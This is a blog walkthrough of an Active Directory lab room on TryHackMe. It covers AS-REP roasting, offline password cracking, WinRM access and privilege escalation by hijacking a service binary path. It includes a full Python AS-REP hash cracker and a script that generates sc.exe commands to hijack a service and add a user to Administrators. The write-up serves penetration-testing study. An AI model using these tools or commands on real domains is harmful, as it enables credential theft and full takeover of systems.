Hacker4U
9 min readAug 10, 2024

Walkthrough Services (TryHackMe)

Services is an intermediate-level room on THM that covers a fairly common Active Directory attack path to gain initial access to the system. From there, as you may have guessed, insecure service permissions are used to escalate our privileges to administrator. My goal for this post is not only to list the steps I took to eventually root this system, but also to explain my reasoning behind what I did. Let’s get started!

We’ll start with a port scan of the machine to see what services are running and try to determine what environment we’re dealing with. I always start by scanning the top 1000 ports (this is the default if you don’t use the “-p” switch to specify a port range) and add the -sV switch (to detect service versions) and the -sC switch (to run Nmap’s default scripts against the services it finds). Here is what we get:

We can tell it’s a Windows box because of the open ports: 135, 139 and 445 are common to Windows machines, and 88 and 389 on top of those tell us this is a domain controller (DC), which means we are dealing with an Active Directory environment. This is an important distinction to make when trying to figure out which attack paths we should pursue.
Note: The domain controller will run services that standard servers or desktops will not, such as DNS (53), Kerberos (88), and LDAP (389).

Before we dive into enumerating some of these services, I’d like to mention that I always run a full port scan (with the “-p-” switch) after my initial scan to make sure we’re not missing any ports. To speed up the scan I use -T4. The -T flag selects the timing template, which controls how aggressively Nmap scans: the templates range from -T0 (the slowest and most stealthy) to -T5 (the fastest but least stealthy).
Here’s what it revealed:

Full port scan with version and script info (note the “-p-” switch)

The only additional port I want to highlight is 5985. This shows that Windows Remote Management (WinRM) over HTTP is enabled. We’ll come back to this later once we have a set of valid credentials.

NOTE: It’s important to understand that this port (5985) is not in nmap’s top 1000 ports, so it will not show up in the default scan. WinRM is very common in Windows environments and very valuable to attackers (with valid credentials and the right group membership it hands you a remote PowerShell session), so it should not be overlooked!

Okay, so here’s what I want to start enumerating based on our scan results:

SMB (445): Many people still do not know the wonderful netexec tool, so I’ll briefly explain what it is. It is a network service exploitation tool (the maintained successor to crackmapexec) used in network penetration testing to enumerate and authenticate against SMB, WinRM, LDAP and other services on many hosts at once, and, once you have credentials, to execute commands on those remote systems. I wrote a separate post comparing netexec to crackmapexec that shows how powerful the tool is for gathering information.

Pointing netexec at the target’s SMB service, even without credentials, already shows basic information about our target, like what operating system it runs and the domain name:

HTTP — web servers can always be a viable path into a network and may also expose sensitive information (as we’ll soon find out!).

Before we get too crazy with our enumeration, I always like to browse the site to get an overall feel for the purpose of the web app, where potential vulnerabilities may exist, and if any sensitive information may be exposed. Here’s what sticks out to me:

Username / Email Format — Interesting!
Employee names

This site not only reveals the format of their emails (first_initial.last_name), but it also gives us a list of employee names that allows us to create a list of possible usernames! The value of this cannot be overstated. With a list of valid usernames, we can try password spraying attacks and, most importantly, an AS-REP Roasting attack (more on that in a second).

Based on this information, I don’t feel the need to enumerate the web server any further right now, because I want to try a typical AD attack path first (if that doesn’t work, we can always fall back to the web server). So I add the following usernames to a file called users.txt to prepare for this attack:

Without a valid set of credentials, we’re limited in what we’re able to do. Kerberoasting, querying LDAP, accessing RDP, etc. are all out of the picture for now.

But because Kerberos is the default authentication mechanism in Active Directory, we have one viable option to gain access to this box: AS-REP Roasting! Let me briefly explain what this is…

To access a resource in AD, a user must first request a Ticket Granting Ticket (TGT) from the Key Distribution Center (KDC), which runs on the DC. Normally, this request (called an Authentication Service Request or AS-REQ) contains a timestamp that the user encrypted with a key derived from their password (for the RC4 encryption type, that key is simply the user’s NT hash). When the KDC receives this encrypted timestamp, it decrypts it with the same key, which it also has access to (the DC keeps a copy of every user’s password hash). If the KDC can successfully decrypt the timestamp and it is recent, it issues a TGT to the user (this step is called the Authentication Service Response or AS-REP).

All of that sounds relatively secure, but here’s where things can get crazy. It’s possible to disable this “preauthentication” (the step where the user has to encrypt a timestamp to prove their identity) on a per-account basis, via the “Do not require Kerberos preauthentication” option on the account. If this is done, the user is able to request a TGT without providing an encrypted timestamp to verify that they are who they say they are.

Here’s what this means: if a user’s account doesn’t require preauthentication, we can request a TGT on their behalf without knowing their password. The AS-REP we get back contains a part (the session key and ticket details) that the KDC encrypted with that user’s password-derived key, and it is that encrypted blob, not the TGT itself, that we can crack offline to reveal their password! Let’s give it a shot!

The tool for this is impacket-GetNPUsers (GetNPUsers.py from the Impacket suite). There are just two prerequisites to use this tool:

  • Step 1: We need a list of valid usernames (which we already created: users.txt).
  • Step 2: We need to add the domain name (services.local) to our /etc/hosts file and have it point to the DC:
    10.10.101.161 services.local

With those two steps complete, let’s attempt some AS-REP roasting:

Boom! User j.rock has preauth disabled, which means we were able to grab the encrypted part of his AS-REP (the “hash” GetNPUsers prints), which we can crack using hashcat:

To crack AS-REP hashes of this kind (RC4, the $krb5asrep$23$ format), use mode 18200 in hashcat. If the DC had answered with an AES-encrypted AS-REP instead ($krb5asrep$17$ or $18$), newer hashcat versions have separate modes for those.
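To make concrete what GetNPUsers hands over and what hashcat actually tests per guess, here is an added worked example (my own code, not code from the room write-up, Impacket or hashcat). It rebuilds the RC4-HMAC construction from RFC 4757 that the KDC applies to the AS-REP encrypted part, emits the result in the $krb5asrep$23$ line format, and then runs the same checksum test hashcat mode 18200 performs against a small wordlist. The account name j.rock and the realm SERVICES.LOCAL are taken from the room; the password, the wordlist, the fixed confounder and the plaintext stand-in for the EncASRepPart are constructed for the demo and are not the room’s values. MD4 and RC4 are implemented inline because both are often unavailable from hashlib/OpenSSL 3.

```python
import hashlib
import hmac
import struct

AS_REP_ENC_PART_USAGE = 8  # key usage MS KDCs apply to the RC4 AS-REP enc-part (hashcat 18200 assumes it)


def md4(data):
    """MD4 (RFC 1320) in pure Python; hashlib's md4 is often disabled under OpenSSL 3."""
    mask = 0xFFFFFFFF
    rot = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + (len(data) * 8).to_bytes(8, "little")
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), range(16)),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, k, shifts, order in rounds:
            for i, j in enumerate(order):
                a = rot((a + func(b, c, d) + x[j] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)); for RC4-HMAC this is the Kerberos key itself."""
    return md4(password.encode("utf-16le"))

def rc4(key, data):
    """Plain RC4 (KSA + PRGA), the stream cipher behind Kerberos etype 23."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def _k1(key, usage):
    return hmac.new(key, usage.to_bytes(4, "little"), hashlib.md5).digest()

def rc4_hmac_encrypt(key, usage, plaintext, confounder):
    """RFC 4757: checksum = HMAC-MD5(K1, confounder||pt), K3 = HMAC-MD5(K1, checksum),
    output = checksum || RC4(K3, confounder||pt). This is what the KDC does to the enc-part."""
    k1 = _k1(key, usage)
    data = confounder + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, data)

def rc4_hmac_decrypt(key, usage, blob):
    """Inverse of the above; returns the plaintext or None when the checksum fails.
    That one comparison is the entire offline test for a candidate password."""
    checksum, edata = blob[:16], blob[16:]
    k1 = _k1(key, usage)
    data = rc4(hmac.new(k1, checksum, hashlib.md5).digest(), edata)
    if not hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum):
        return None
    return data[8:]  # strip the 8-byte confounder

def build_asrep_hash(user, realm, password, enc_part_plaintext, confounder):
    """The line GetNPUsers prints and hashcat 18200 reads: $krb5asrep$23$user@REALM:checksum$edata."""
    blob = rc4_hmac_encrypt(nt_hash(password), AS_REP_ENC_PART_USAGE, enc_part_plaintext, confounder)
    return f"$krb5asrep$23${user}@{realm}:{blob[:16].hex()}${blob[16:].hex()}"

def crack_asrep(hash_line, wordlist):
    """Offline dictionary attack on one $krb5asrep$23$ line; returns the password or None."""
    checksum_hex, edata_hex = hash_line.split(":", 1)[1].split("$", 1)
    blob = bytes.fromhex(checksum_hex) + bytes.fromhex(edata_hex)
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), AS_REP_ENC_PART_USAGE, blob) is not None:
            return candidate
    return None

# Constructed demo inputs: user and realm come from the room, everything else is made up.
SAMPLE_USER, SAMPLE_REALM, SAMPLE_PASSWORD = "j.rock", "SERVICES.LOCAL", "Summer2024!"
SAMPLE_CONFOUNDER = bytes(range(8))  # a real KDC uses 8 random bytes; fixed here for reproducibility
SAMPLE_ENC_PART = b"\x30\x81\x40" + b"EncASRepPart stand-in: session key, ticket times, nonce"
SAMPLE_WORDLIST = ["password", "Welcome1", "Spring2024!", "Summer2024!", "Autumn2024!"]

def demo():
    """Build the roastable AS-REP for the preauth-disabled account, then crack it."""
    line = build_asrep_hash(SAMPLE_USER, SAMPLE_REALM, SAMPLE_PASSWORD, SAMPLE_ENC_PART, SAMPLE_CONFOUNDER)
    return line, crack_asrep(line, SAMPLE_WORDLIST)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Note what the loop in crack_asrep does not need: the KDC. One AS-REQ gave us a blob keyed only by the user’s own password, so every further guess is local and rate-limited by nothing but our hardware, which is why hashcat on a GPU goes through rockyou in seconds.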

Now we have a set of valid credentials, but where can we use them? Based on our port scan we have three main options for remote access:

  • Connect via psexec over SMB (can’t do this because j.rock isn’t an admin; psexec needs to write to ADMIN$ and create a service)
  • RDP (must be a member of the Remote Desktop Users group, which we aren’t)
  • WinRM (must be a member of the Remote Management Users group, which we are!)
I tried the first two options and was unsuccessful (for the reasons listed above), but I was able to connect using WinRM (remember port 5985?) with a tool called evil-winrm:

Remote access via evil-winrm

What this gives us is a remote PowerShell session on the Domain Controller. Now we’ll just grab the user flag and move on to some privilege escalation!

User.txt flag captured!

Privilege escalation:

One of the first steps I take when I get a shell on a system is to look at what groups the user belongs to and what privileges they already have:

Member of the Server Operators group

Running “whoami /all” reveals that j.rock is a member of the “Server Operators” group. Members of this group can, among other things, start and stop services on the DC. This is a hint as to which way this privilege escalation is going to go.

In my experience, one of the reasons we need to stop and start a service is after we change the service’s binary path. The binary path of a service is the executable (or command) the Service Control Manager runs when the service starts. If we can change a service’s binary path, we can make it execute a malicious payload or command of our choice, with the privileges of the account the service runs as. Let’s see if it will work.

evil-winrm has a built-in command called “services” that we can run to list the available services and whether or not our account has the required privileges to access them:

Based on this output, let’s see if we can modify the binary path of the first service in the list (ADWS).

ADWS stands for Active Directory Web Services. It is a Windows service on domain controllers that exposes Active Directory data over a web service (SOAP) interface, which remote management tools such as the Active Directory PowerShell module and the Active Directory Administrative Center use instead of the older LDAP-based consoles like Active Directory Users and Computers (ADUC). Like most built-in services it runs as the local SYSTEM account, which is exactly why hijacking its binary path is attractive.

Our goal is to add j.rock to the Administrators group so we can grab the root flag, so the new binary path will be a command that does exactly that. If changing the binary path succeeds, we’ll follow that up by stopping and starting the service (remember, the new binary path isn’t executed until the service starts again). Two things to keep in mind: inside PowerShell, “sc” is an alias for Set-Content, so call “sc.exe” explicitly; and the start will report an error because our command is not a real service executable that checks in with the Service Control Manager, but by then the command has already run.
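Whether this works on a given service depends on that service’s own DACL, not just on being a Server Operator: rewriting the binary path needs SERVICE_CHANGE_CONFIG, and triggering it needs SERVICE_STOP and SERVICE_START. Here is an added example (my own code, not the room’s, evil-winrm’s or Microsoft’s) that parses the SDDL string “sc.exe sdshow <service>” prints, works out which of those rights a set of principals holds, and only then lists the sc.exe sequence to abuse the service. The two descriptors, the second service name, the payload command and the trustee aliases for j.rock are constructed or assumed for the demo; the parser handles only plain allow/deny ACEs and assumes canonical ordering (denies first).

```python
import re

# Service-specific access rights and the two-letter SDDL tokens sc.exe sdshow prints for them.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG", "LC": "SERVICE_QUERY_STATUS",
    "SW": "SERVICE_ENUMERATE_DEPENDENTS", "RP": "SERVICE_START", "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE", "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
# What the binPath trick needs: rewrite the config, then bounce the service.
HIJACK_RIGHTS = {"SERVICE_CHANGE_CONFIG", "SERVICE_STOP", "SERVICE_START"}
# Access-allowed / access-denied ACEs only: (type;flags;rights;object;inherited-object;trustee)
ACE_RE = re.compile(r"\((?P<type>[AD]);[^;]*;(?P<rights>[^;]*);[^;]*;[^;]*;(?P<trustee>[^)]*)\)")

def rights_from_tokens(tokens):
    """Expand an SDDL rights string ("CCDCLCSW...", or FA/GA for everything) to right names."""
    if tokens in ("FA", "GA"):
        return set(SERVICE_RIGHTS.values())
    pairs = (tokens[i:i + 2] for i in range(0, len(tokens), 2))
    return {SERVICE_RIGHTS[p] for p in pairs if p in SERVICE_RIGHTS}

def parse_dacl(sddl):
    """Return [(ace_type, rights, trustee)] for the D: section of an sdshow-style SDDL string."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]
    return [(m.group("type"), rights_from_tokens(m.group("rights")), m.group("trustee"))
            for m in ACE_RE.finditer(dacl)]

def effective_rights(sddl, trustees):
    """Rights held by any of `trustees` (SDDL aliases such as SO, or SID strings).
    Assumes a canonical DACL (denies ordered first) and ignores inheritance flags."""
    allowed, denied = set(), set()
    for ace_type, rights, trustee in parse_dacl(sddl):
        if trustee in trustees:
            (allowed if ace_type == "A" else denied).update(rights)
    return allowed - denied

def binpath_hijack_commands(service, sddl, trustees, command):
    """If the trustees can reconfigure, stop and start the service, return the sc.exe
    sequence that abuses it plus an empty list; otherwise (None, sorted missing rights)."""
    missing = sorted(HIJACK_RIGHTS - effective_rights(sddl, trustees))
    if missing:
        return None, missing
    return [
        f"sc.exe qc {service}",                           # record the original binPath to restore later
        f'sc.exe config {service} binPath= "{command}"',  # the space after "binPath=" is mandatory
        f"sc.exe stop {service}",
        f"sc.exe start {service}",                        # runs the command; start itself reports an error
    ], []

# Constructed descriptors for the demo (not copied from the room's ADWS service). The first grants
# Server Operators (SO) change-config/start/stop; the second is the usual default, where only
# SYSTEM (SY) and Administrators (BA) may reconfigure the service.
SDDL_WEAK = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRRC;;;SO)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
             "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
SDDL_DEFAULT = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)")
# Aliases j.rock's token carries: Server Operators (from the page) and Authenticated Users (every domain user).
JROCK_TRUSTEES = {"SO", "AU"}
ADD_ADMIN = "cmd.exe /c net localgroup Administrators j.rock /add"  # assumed payload

if __name__ == "__main__":
    for name, sddl in (("ADWS", SDDL_WEAK), ("OtherSvc", SDDL_DEFAULT)):  # "OtherSvc" is made up
        cmds, missing = binpath_hijack_commands(name, sddl, JROCK_TRUSTEES, ADD_ADMIN)
        print(name, "->", "\n  ".join(cmds) if cmds else f"not hijackable, missing {missing}")
```

On the target you would paste the real output of “sc.exe sdshow ADWS” into effective_rights; the SDDL alias for Server Operators is SO (SID S-1-5-32-549). Recording the original binPath with “sc.exe qc” before changing it matters for cleanup: on a DC, leaving ADWS pointing at a bogus command breaks the AD PowerShell module for everyone until it is restored.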

Success! We’ll log out and log back in as j.rock and verify our new group membership:

We’re now part of the Administrators group!

Now that our user is a member of the Administrators group, we can change the password of the built-in Administrator account and do anything we set our minds to.

I decided to connect via RDP as the Administrator user to capture the last flag, root.flag.

Since this is my first post on Medium, I decided to take it a step further, since I am preparing for certifications such as CRTP and OSCP.
For every machine that is related to the world of AD, I will post my ways of dealing with it, my solutions and what tools I used. I built myself some methods of attack and access to machines in the AD environment, and I hope I will be able to give you inspiration and ways to deal with machines related to the AD environment. Thank you for reading and stay tuned for more articles.
Ahhh and don’t forget to follow me ;)

See you in the next article



Written by Hacker4U

Information security consultant. I specialize in protecting digital assets by performing vulnerability assessments and providing strategic advice to reduce risks.
